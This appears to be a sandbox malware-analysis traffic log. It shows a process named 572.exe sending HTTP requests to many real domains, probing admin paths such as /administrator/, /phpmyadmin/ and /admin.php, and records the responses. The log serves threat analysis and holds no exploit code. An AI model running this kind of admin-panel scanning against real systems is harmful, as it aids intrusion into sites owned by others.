Feb 5, 2024 12:14:51.347701073 CET  178  OUT  GET /administrator/ HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.568666935 CET  226  IN  HTTP/1.1 409 Conflict
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: Apache
Content-Length: 83
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
201         192.168.2.6  55403        13.249.120.86   80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:51.347718954 CET  174  OUT  GET /administrator/ HTTP/1.1
Host: tiktok.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.451564074 CET  574  IN  HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://tiktok.com/administrator/
X-Cache: Redirect from cloudfront
Via: 1.1 c403373b316e0bf7f3a326c1ff50549e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL51-C1
X-Amz-Cf-Id: ad0SNust0C0AoQ3_eS-uAD5P27IiyMrWgOMUizR4Al5XX-EqnxuLPQ==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
Feb 5, 2024 12:15:00.090922117 CET  183  OUT  GET /administrator/index.php HTTP/1.1
Host: tiktok.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:00.192435026 CET  583  IN  HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:15:00 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://tiktok.com/administrator/index.php
X-Cache: Redirect from cloudfront
Via: 1.1 c403373b316e0bf7f3a326c1ff50549e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL51-C1
X-Amz-Cf-Id: 7yUZ4Ah0jlAYaF0q-G4Qp9m7ciqL2bSwFo1xQuQOCJUl9VjabvwTqQ==
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
202 | 192.168.2.6 | 55400 | 3.134.125.175 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.348078012 CET | 193 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.470964909 CET | 334 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/administrator/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 9fb72879f41a7cb8d3310d13d57fc275
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 88
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/administrator/">Temporary Redirect</a>.
Feb 5, 2024 12:16:06.354140043 CET | 202 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.477114916 CET | 352 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 52d8788210ef19435f8fcb6f2de18da8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 97
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/administrator/index.php">Temporary Redirect</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
203 | 192.168.2.6 | 55416 | 3.161.136.69 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.350908041 CET | 193 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.452697992 CET | 593 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 8aab54319c0ac9015398a33740754126.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Kw0abCXq9AXr-L9WgCB8HDG5MHfy9bix6gXpLzRY5vVNfT_pHGJHqw==
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
204 | 192.168.2.6 | 55402 | 170.114.52.4 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.350955963 CET | 179 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.492089033 CET | 1027 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=hEFd9VotZ3vyLm3XCxgQ38NStr8IlQwszyEH3jTE36k-1707131691-1-Ad8gM1Twu9Jb7c7bwW/Lnf0FOIqZuaEXj3c49w6h515FGYT7zevcKG7KUwj9NQP+zsgeE8MARtdmGpgaeBD1BCM=; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AEfU2FM5jBx8uJLl8JDr3REL8rTpdPiUDYo0qzRrCzsL0o9sQ6YZqfE2rf7uclJ%2BuyJiErXz5YGHSmc4KT%2B0R3%2F1qNctIt53C4uJipP%2FGq0%2FMISPWOHLvBsdjfV3RDgVSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6f4c6a7be1-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>
Feb 5, 2024 12:16:05.981450081 CET | 351 | OUT | GET /administrator/index.php HTTP/1.1
Host: us04web.zoom.us
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cf_bm=hEFd9VotZ3vyLm3XCxgQ38NStr8IlQwszyEH3jTE36k-1707131691-1-Ad8gM1Twu9Jb7c7bwW/Lnf0FOIqZuaEXj3c49w6h515FGYT7zevcKG7KUwj9NQP+zsgeE8MARtdmGpgaeBD1BCM=
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
205 | 192.168.2.6 | 55413 | 104.21.5.25 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.351686001 CET | 187 | OUT | GET /administrator/index.php HTTP/1.1
Host: opsu.terna.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.479321003 CET | 693 | IN | HTTP/1.1 307 Temporary Redirect
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Location: https://terna.net
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6T5WzYOSDgN22zIf02Bj7FcgkEQ8epDTQvsfUcC4hHSUPNu4uoQwyOjS4SIW0wrRizc4H67VqSytmrqRAnplr8x7AcW1Yi9Y8q14L%2FUdOqEwUOACuZjYtYzihU7knChzcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb6f494d44d0-ATL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
206 | 192.168.2.6 | 55401 | 103.224.182.210 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.354595900 CET | 183 | OUT | GET /administrator/ HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.561472893 CET | 351 | IN | HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:14:51 GMT
server: Apache
set-cookie: __tad=1707131691.1659755; expires=Thu, 02-Feb-2034 11:14:51 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
207 | 192.168.2.6 | 55202 | 188.212.100.154 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.354721069 CET | 175 | OUT | GET /administrator/ HTTP/1.1
Host: zarkana2.ro
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.592978001 CET | 1033 | IN | HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
content-length: 795
date: Mon, 05 Feb 2024 11:16:17 GMT
server: LiteSpeed
location: https://zarkana2.ro/administrator/
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
208 | 192.168.2.6 | 55232 | 64.190.63.111 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.354990005 CET | 173 | OUT | GET /administrator/ HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.563971043 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:14:51 GMT
content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.598057985 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://foros.net/administrator/
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.806505919 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
209 | 192.168.2.6 | 55357 | 47.251.24.188 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.355262995 CET | 182 | OUT | GET /administrator/ HTTP/1.1
Host: cjdropshipping.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.540885925 CET | 355 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://cjdropshipping.com/administrator
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 5, 2024 12:14:58.657588005 CET | 191 | OUT | GET /administrator/index.php HTTP/1.1
Host: cjdropshipping.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:58.843142033 CET | 365 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:58 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://cjdropshipping.com/administrator/index.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
210 | 192.168.2.6 | 55803 | 192.185.5.23 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.459000111 CET | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.639163017 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: nginx/1.23.4
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Server-Cache: true
X-Proxy-Cache: MISS
Set-Cookie: PHPSESSID=9726ade2ef560c0dc5240a8df153057b; path=/
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639326096 CET1286INData Raw: 20 bf 93 e5 f1 83 4f da 2c 51 71 60 18 cd 6e 65 19 43 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: O,Qq`neCIU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-k
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639342070 CET386INData Raw: 8a 22 32 81 05 d8 7c d0 f2 93 95 db e1 a5 a1 41 f3 65 ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "2|Aeu,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSY
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639358044 CET1286INData Raw: 35 61 63 0d 0a eb d3 d3 15 f8 a8 4b 6f a1 5f c3 1f 70 90 bd c7 9c 06 bb 57 06 dc cb 8f 92 ab 67 32 25 0f 64 ca 63 ce 1f f2 4f be 82 bf c7 96 a7 d4 e7 b7 61 52 74 32 c5 98 a4 26 c3 86 09 8a a7 e2 f2 62 76 b7 18 d6 97 af 2e 66 87 c7 db eb 6d 8f 28
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 5acKo_pWg2%dcOaRt2&bv.fm([ne=:vb-j`l+d2~r102Pr1rCxKp{sZ0<?CU*:S>N?4eM
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639374971 CET1286INData Raw: 9f c6 a1 2d 57 ab 8d cf 7d 77 da 8b 1b 0d 29 d0 51 ac e2 cb 26 84 81 66 36 51 27 4e 84 a5 5d 59 a3 41 d6 27 92 c9 c1 0b 22 39 95 dc 68 79 7d ba 0a b2 82 35 65 93 ec 4e 28 d6 32 eb 7c 82 3b 7d 52 37 bf 66 70 95 8b f9 e6 bc 73 3e 6d 46 2b 12 98 aa
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -W}w)Q&f6Q'N]YA'"9hy}5eN(2|;}R7fps>mF+h4hg-yqjgS<C:)|%got:;g1s*Q_&eMyK>]2S|V=Sb63$_I|"G1-6hy4',@U?]5B&%#
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.639393091 CET1286INData Raw: 53 ec 8d 11 3f 8c 4b 36 ee a8 03 45 d9 c9 47 be 52 93 67 95 cb 2b 35 69 f3 74 65 1d 6b 64 9e b3 47 a4 5b b3 86 c4 b1 aa 8f 5a be 76 d5 d9 36 d9 03 88 47 3a 25 7e ba 8a 34 b7 32 89 c0 d7 a6 6c 8c 39 b2 43 dd ac 01 08 f4 1e f3 07 dc 53 87 a3 11 9b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: S?K6EGRg+5itekdG[Zv6G:%~42l9CSNite2)"F3GQ6SV&Dvd>3sY:bgxp>M1T212CM!lo,dL9jW9'cItc9 p$-aw36PJR/wc!
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.741106987 CET1286INData Raw: ee 91 41 b1 3a b7 1b f2 8f dc ec 72 ea b8 e3 a4 df 30 89 77 b9 83 74 53 cf b5 c3 73 cb dd a4 5e 4d 20 0c 13 6c bb 5c 9f b7 7b de 65 78 5e 71 97 eb 27 bb e5 5e 4f c5 e5 c5 ec 6e 31 ac 2f 5f 5d cc 0e 8f b7 d7 db 1e 51 0e 54 b7 9a 17 dd 72 bb d1 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: A:r0wtSs^M l\{ex^q'^On1/_]QTrnP}z~^TYpMPxe1=E%2:8T g94>V'O1'_O:y&Etelmin3R9SMnG7c).oIzKMzX)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
211 | 192.168.2.6 | 55842 | 31.13.65.7 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.500289917 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: lookaside.fbsbx.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.602051020 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
Location: https://lookaside.fbsbx.com/phpmyadmin/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:14:51 GMT
Connection: keep-alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
212 | 192.168.2.6 | 55394 | 172.66.43.64 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.508348942 CET | 187 | OUT | GET /administrator/ HTTP/1.1
Host: nuevopacto.runacode.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.637916088 CET | 657 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://nuevopacto.runacode.com/administrator/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eKKCiUBoVIEqO5PFJu0kKDThamSW74w6ijIrBbtE7dVz3ckOJ9wqeqkI9CrBmcbig%2FzR5tP2ft%2FKcoc2BuCfXgKw2MFQIajXFyeRGKq64CmPRrxjZvn03G5EQcJP4IvWsOQwBIN5SYUO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb7049ed244e-ATL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:16:05.920079947 CET | 196 | OUT | GET /administrator/index.php HTTP/1.1
Host: nuevopacto.runacode.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.046322107 CET | 668 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:05 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:16:05 GMT
Location: https://nuevopacto.runacode.com/administrator/index.php
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lp7dai8UB%2Bw7humFtXM%2BanNA83WKqndlYd5zXZxXRpfdP3VmAQMW0T5VxuGy1Hsv0yNponDHv2vOPAK0YvYiXzgNS18NcMZrdNV9MuJcuAzFOdHdQG1qVBK68yjjAVq30Ut%2BnVQEpfFg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd415e98244e-ATL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
213 | 192.168.2.6 | 55366 | 45.60.74.50 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.508348942 CET | 187 | OUT | GET /administrator/ HTTP/1.1
Host: zuhauseplus.vodafone.de
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
214 | 192.168.2.6 | 55364 | 87.233.198.20 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.508502960 CET | 189 | OUT | GET /administrator/ HTTP/1.1
Host: idp.uitgeverij-deviant.nl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.702135086 CET | 126 | IN | HTTP/1.1 302 Found
content-length: 0
location: https://idp.uitgeverij-deviant.nl/administrator/
cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
215 | 192.168.2.6 | 55634 | 179.191.175.66 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519718885 CET | 201 | OUT | GET /administrator/index.php HTTP/1.1
Host: servicossociais.caixa.gov.br
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.667617083 CET | 1017 | IN | HTTP/1.1 301 Moved Permanently
Server: azion webserver
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Set-Cookie: __uzma=f87892b0-a2fe-41d6-8544-af3f63dc29a8; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: __uzmb=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: __uzme=2788; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: __uzmc=546391087875; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: __uzmd=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Location: https://servicossociais.caixa.gov.br/administrator/index.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
216 | 192.168.2.6 | 55703 | 23.4.32.216 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.519718885 CET | 177 | OUT | GET /admin.php HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.627239943 CET | 183 | IN | HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: https://steamcommunity.com/admin.php
Date: Mon, 05 Feb 2024 11:14:51 GMT
